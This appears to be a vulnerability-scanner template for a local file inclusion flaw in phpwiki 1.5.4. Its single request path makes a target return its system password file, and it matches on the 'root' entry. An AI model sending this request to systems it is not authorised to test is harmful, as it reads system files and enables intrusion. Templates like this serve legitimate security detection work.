id: phpwiki-lfi info: name: phpwiki 1.5.4 - Cross-Site Scripting/Local File Inclusion author: 0x_Akoko severity: high description: phpwiki 1.5.4 is vulnerable to cross-site scripting and local file inclusion, and allows remote unauthenticated attackers to include and return the content of locally stored files via the 'index.php' endpoint. reference: - https://www.exploit-db.com/exploits/38027 tags: phpwiki,lfi,xss requests: - method: GET path: - "{{BaseURL}}/phpwiki/index.php/passwd" matchers-condition: and matchers: - type: regex regex: - "root:[x*]:0:0" - type: status status: - 200 # Enhanced by mp on 2022/08/04